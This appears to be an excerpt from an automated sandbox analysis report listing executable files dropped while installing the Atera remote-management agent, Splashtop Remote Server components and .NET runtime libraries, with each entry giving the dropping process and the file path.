                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI172D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIFB85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdsmplui.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\my_setup.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperEx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiHelper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\avutil-55.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppBrowser.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\my_setup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA0BF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUpdate.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiCaptor.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9F94.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6833.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcelt-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUACCheck.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSocketCtrl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DD5.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\Mirror2Extend.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libx264-116.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\ISRT.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\system32\SRCredentialProvider.dll (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
